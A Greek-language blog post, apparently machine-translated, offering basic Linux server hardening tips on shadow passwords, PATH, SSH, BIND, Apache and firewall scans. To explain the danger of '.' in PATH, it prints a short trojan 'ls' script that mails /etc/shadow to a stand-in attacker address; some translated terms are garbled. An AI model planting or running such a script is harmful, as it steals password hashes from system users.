Συμβουλές ασφαλείας για το Linux (διακομιστής) (Μέρος 1)

@Jlcmux

5 λεπτά

Δεν έχω δημοσιεύσει τίποτα στο blog για πολύ καιρό και θα ήθελα να μοιραστώ μαζί σας μερικές συμβουλές από ένα βιβλίο που (Μεταξύ άλλων). Το βρήκα στο Πανεπιστήμιο και μόλις διάβασα και αν και ειλικρινά είναι λίγο ξεπερασμένο και οι τεχνικές που εμφανίζονται είναι πολύ απίθανο να λειτουργήσουν δεδομένης της εξέλιξης του συστήματος, είναι επίσης ενδιαφέρουσες πτυχές που μπορούν να προβληθούν. 9788448140502

Θέλω να ξεκαθαρίσω ότι είναι συμβουλές προσανατολισμένες σε ένα σύστημα Linux που χρησιμοποιείται ως διακομιστής, σε μεσαία ή ίσως μεγάλη κλίμακα, καθώς σε επίπεδο χρήστη επιτραπέζιου υπολογιστή, αν και μπορούν να εφαρμοστούν, δεν θα ήταν πολύ χρήσιμα.

Σημειώνω επίσης ότι είναι απλές γρήγορες συμβουλές και δεν θα αναφερθώ σε πολλές λεπτομέρειες, αν και σκοπεύω να κάνω μια άλλη πολύ πιο συγκεκριμένη και εκτεταμένη ανάρτηση σε ένα συγκεκριμένο θέμα. Αλλά θα το δω αργότερα. Ας αρχίσουμε.

Πολιτικές κωδικού πρόσβασης. 

Αν και ακούγεται σαν φράση πρόσβασης, η καλή πολιτική κωδικού πρόσβασης κάνει τη διαφορά μεταξύ ενός ευάλωτου συστήματος ή όχι. Επιθέσεις όπως το "brute force" εκμεταλλεύονται τον κακό κωδικό πρόσβασης για πρόσβαση σε ένα σύστημα. Οι πιο συνηθισμένες συμβουλές είναι:

  • Συνδυάστε κεφαλαία και πεζά.
  • Χρησιμοποιήστε ειδικούς χαρακτήρες.
  • Αριθμοί.
  • Περισσότερα από 6 ψηφία (ελπίζουμε περισσότερα από 8).

Εκτός από αυτό, ας εξετάσουμε δύο βασικά αρχεία.  / etc / passwd και / etc / shadow.

Κάτι πολύ σημαντικό είναι ότι το αρχείο / etc / passwd. Εκτός από το να μας δώσετε το όνομα του χρήστη, το uid, τη διαδρομή φακέλου, το bash .. κ.λπ. σε ορισμένες περιπτώσεις δείχνει επίσης το κρυπτογραφημένο κλειδί του χρήστη.

 Ας δούμε την τυπική του σύνθεση.

desdelinux:FXWUuZ.vwXttg:500:501::/home/usuario1:/bin/bash

χρήστης: cryptkey: uid: gid: path :: path: bash

Το πραγματικό πρόβλημα εδώ είναι ότι αυτό το συγκεκριμένο αρχείο έχει δικαιώματα -rw-r - r– που σημαίνει ότι έχει δικαιώματα ανάγνωσης για οποιονδήποτε χρήστη στο σύστημα. και το να έχεις το κρυπτογραφημένο κλειδί δεν είναι πολύ δύσκολο να αποκρυπτογραφήσεις το πραγματικό.

Γι 'αυτό το αρχείο υπάρχει / κλπ / σκιά. Αυτό είναι το αρχείο όπου αποθηκεύονται όλα τα κλειδιά χρήστη, μεταξύ άλλων. Αυτό το αρχείο έχει τα απαραίτητα δικαιώματα, ώστε κανένας χρήστης να μην μπορεί να το διαβάσει.

Για να το διορθώσουμε τότε, πρέπει να πάμε στο αρχείο / etc / passwd και αλλάξτε το κρυπτογραφημένο κλειδί σε "x", αυτό θα σώσει μόνο το κλειδί στο αρχείο μας / κλπ / σκιά.

desdelinux:x:500:501::/home/usuario1:/bin/bash

Προβλήματα με το PATH και το .bashrc και άλλα.

Όταν ένας χρήστης εκτελεί μια εντολή στην κονσόλα του, το κέλυφος αναζητά αυτήν την εντολή σε μια λίστα καταλόγων που περιέχεται στη μεταβλητή περιβάλλοντος PATH.

Εάν πληκτρολογήσετε "echo $ PATH" στην κονσόλα θα εμφανιστεί κάτι τέτοιο.

.:/usr/local/bin:/usr/bin:/bin:/usr/bin/X11:/usr/games:/home/carlos/bin

Κάθε ένας από αυτούς τους φακέλους είναι όπου το κέλυφος θα αναζητήσει την εντολή που έχει γραφτεί για την εκτέλεση του. Αυτός "." Αυτό σημαίνει ότι ο πρώτος φάκελος για αναζήτηση είναι ο ίδιος φάκελος από τον οποίο εκτελείται η εντολή.

Ας υποθέσουμε ότι υπάρχει ένας χρήστης "Carlos" και αυτός ο χρήστης θέλει να "κάνει κακό". Αυτός ο χρήστης θα μπορούσε να αφήσει ένα αρχείο που ονομάζεται "ls" στον κύριο φάκελό του και σε αυτό το αρχείο να εκτελέσει μια εντολή όπως:

#!/bin/bash
cat /etc/shadow | mail hacker@mail.com
/bin/ls

Και εάν ο ριζικός χρήστης για πράγματα του προορισμού, προσπαθήσει να παραθέσει τους φακέλους μέσα στο φάκελο carlos (καθώς αναζητά για πρώτη φορά την εντολή στον ίδιο φάκελο, κατά λάθος θα έστελνε το αρχείο με τους κωδικούς πρόσβασης σε αυτό το email και στη συνέχεια θα εμφανιστούν οι φάκελοι και δεν θα το μάθαινε μέχρι πολύ αργά.

Για να το αποφύγουμε αυτό πρέπει να εξαλείψουμε το "." της μεταβλητής PATH.

Με τον ίδιο τρόπο, αρχεία όπως /.bashrc, /.bashrc_profile, ./.login θα πρέπει να ελέγχονται και να ελέγχουν ότι δεν υπάρχει "." στη μεταβλητή PATH, και στην πραγματικότητα από αρχεία όπως αυτό, μπορείτε να αλλάξετε τον προορισμό μιας συγκεκριμένης εντολής.

Συμβουλές με υπηρεσίες:

ΣΧ

  • Απενεργοποιήστε την έκδοση 1 του πρωτοκόλλου ssh στο αρχείο sshd_config.
  • Μην επιτρέπετε στον ριζικό χρήστη να συνδεθεί μέσω ssh.
  • Τα αρχεία και οι φάκελοι ssh_host_key, ssh_host_dsa_key και ssh_host_rsa_key θα πρέπει να διαβάζονται μόνο από τον ριζικό χρήστη.

ΔΕΝΩ

  • Αλλάξτε το μήνυμα καλωσορίσματος στο αρχείο bernama.conf έτσι ώστε να μην εμφανίζει τον αριθμό έκδοσης
  • Περιορίστε τις μεταφορές ζώνης και ενεργοποιήστε τις μόνο για ομάδες που τη χρειάζονται.

Apache

  • Αποτρέψτε την υπηρεσία από την εμφάνιση της έκδοσής σας στο μήνυμα καλωσορίσματος. Επεξεργαστείτε το αρχείο httpd.conf και προσθέστε ή τροποποιήστε τις γραμμές:  

ServerSignature Off
ServerTokens Prod

  • Απενεργοποιήστε την αυτόματη ευρετηρίαση
  • Διαμορφώστε το apache ώστε να μην εξυπηρετεί ευαίσθητα αρχεία όπως .htacces, * .inc, * .jsp .. κλπ
  • Κατάργηση σελίδων ή δείγματος από την υπηρεσία
  • Εκτελέστε apache σε ένα chroot περιβάλλον

Ασφάλεια δικτύου.

Είναι σημαντικό να καλύψετε όλες τις πιθανές καταχωρίσεις στο σύστημά σας από το εξωτερικό δίκτυο. Ακολουθούν ορισμένες βασικές συμβουλές για να αποτρέψετε τους εισβολείς από τη σάρωση και τη λήψη πληροφοριών από το δίκτυό σας.

Αποκλεισμός κυκλοφορίας ICMP

Το τείχος προστασίας πρέπει να είναι διαμορφωμένο ώστε να αποκλείει όλους τους τύπους εισερχόμενων και εξερχόμενων απόκρισης ICMP και απόκρισης ηχούς. Με αυτό αποφεύγετε αυτό, για παράδειγμα, ένας σαρωτής που ψάχνει για ζωντανό εξοπλισμό σε μια σειρά ip σας εντοπίζει. 

Αποφύγετε τη σάρωση ping TCP.

Ένας τρόπος σάρωσης του συστήματός σας είναι η σάρωση ping TCP. Ας υποθέσουμε ότι στον διακομιστή σας υπάρχει διακομιστής Apache στη θύρα 80. Ο εισβολέας θα μπορούσε να στείλει ένα αίτημα ACK σε αυτήν τη θύρα. Με αυτό, εάν το σύστημα ανταποκριθεί, ο υπολογιστής θα είναι ζωντανός και θα σαρώσει τις υπόλοιπες θύρες.

Για αυτό, το τείχος προστασίας σας θα πρέπει πάντα να έχει την επιλογή "κατάσταση ευαισθητοποίησης" και θα πρέπει να απορρίπτει όλα τα πακέτα ACK που δεν αντιστοιχούν σε μια ήδη εγκατεστημένη σύνδεση ή περίοδο σύνδεσης TCP.

Μερικές επιπλέον συμβουλές:

  • Χρησιμοποιήστε συστήματα IDS για να εντοπίσετε σάρωση θύρας στο δίκτυό σας.
  • Ρυθμίστε το τείχος προστασίας έτσι ώστε να μην εμπιστεύεται τις ρυθμίσεις της θύρας προέλευσης σύνδεσης.

Αυτό συμβαίνει επειδή ορισμένες σαρώσεις χρησιμοποιούν μια "ψεύτικη" θύρα προέλευσης όπως 20 ή 53, καθώς πολλά συστήματα εμπιστεύονται αυτές τις θύρες επειδή είναι τυπικά ενός ftp ή ενός DNS.

ΣΗΜΕΙΩΣΗ: Θυμηθείτε ότι τα περισσότερα από τα προβλήματα που αναφέρονται σε αυτήν την ανάρτηση έχουν ήδη επιλυθεί σε όλες σχεδόν τις τρέχουσες διανομές. Αλλά δεν πονάει ποτέ να έχουμε βασικές πληροφορίες για αυτές τις ταλαιπωρίες, ώστε να μην συμβούν σε εσάς.

ΣΗΜΕΙΩΣΗ: Αργότερα θα δω ένα συγκεκριμένο θέμα και θα κάνω μια ανάρτηση με πολύ πιο λεπτομερείς και τρέχουσες πληροφορίες.

Ευχαριστώ όλους για ανάγνωση.

Χαιρετισμούς.


Αφήστε το σχόλιό σας

Η διεύθυνση email σας δεν θα δημοσιευθεί. Τα υποχρεωτικά πεδία σημειώνονται με *

*

*

  1. Υπεύθυνος για τα δεδομένα: Miguel Ángel Gatón
  2. Σκοπός των δεδομένων: Έλεγχος SPAM, διαχείριση σχολίων.
  3. Νομιμοποίηση: Η συγκατάθεσή σας
  4. Κοινοποίηση των δεδομένων: Τα δεδομένα δεν θα κοινοποιούνται σε τρίτους, εκτός από νομική υποχρέωση.
  5. Αποθήκευση δεδομένων: Βάση δεδομένων που φιλοξενείται από τα δίκτυα Occentus (ΕΕ)
  6. Δικαιώματα: Ανά πάσα στιγμή μπορείτε να περιορίσετε, να ανακτήσετε και να διαγράψετε τις πληροφορίες σας.

  1.   πληροφορικής dijo
    πριν 8 χρόνια

    Μου άρεσε πολύ το άρθρο και με ενδιαφέρει το θέμα, σας ενθαρρύνω να συνεχίσετε να ανεβάζετε περιεχόμενο.

    Απάντηση στο informatico